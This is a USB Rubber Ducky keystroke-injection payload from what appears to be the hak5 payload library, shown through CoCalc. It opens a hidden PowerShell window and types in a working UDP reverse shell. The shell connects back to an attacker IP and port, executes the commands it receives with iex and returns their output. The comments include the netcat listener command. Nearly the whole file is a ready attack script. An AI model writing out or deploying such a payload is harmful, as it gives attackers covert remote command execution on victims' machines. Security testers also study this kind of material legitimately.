CoCalc -- payload.txt

GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/remote_access/ReverseDuckyIII/payload.txt
²⁹⁶⁴ views

1
REM       ReverseDucky3
2
REM       Version 1.2 (End of Life - This payload won't be updated anymore)
3
REM       OS: Windows / Linux(?) (Not tested with Powershell on Linux)
4
REM       Author: 0i41E
5

6
REM       UDP Reverse shell executed in the background. Might create a firewall pop up, but will execute anyway.
7
REM       Fill in Attacker-IP and Port in Line 18
8
REM       DON'T FORGET TO START LISTENER: nc -ul -p PORT
9

10
DELAY 1500
11
GUI r
12
DELAY 500
13
STRING powershell -NoP -NonI -W hidden
14
DELAY 250
15
ENTER
16

17
DELAY 200
18
STRING $E=New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Parse("0.0.0.0"),PORT);$C=New-Object System.Net.So
19
DELAY 100
20
STRING ckets.UDPClient(53);[byte[]]$B=0..65535|%{0};$SB=([text.encoding]::ASCII).GetBytes('ReverseDuckyIII:');$C.Send($SB,$S
21
DELAY 100
22
STRING B.Length,$E);while($true){;$R=$C.Receive([ref]$E);$RD=([text.encoding]::ASCII).GetString($R);$s=(iex $RD 2>&1 | Out-S
23
DELAY 100
24
STRING tring );$s2=$s+'Ducky@PS ' + (pwd).Path + '> ';$SB =([text.encoding]::ASCII).GetBytes($s2);$C.Send($SB,$SB.Len
25
DELAY 100
26
STRING gth,$E)};$C.Close()
27
ENTER
28

29

30

31

Product

Resources

Company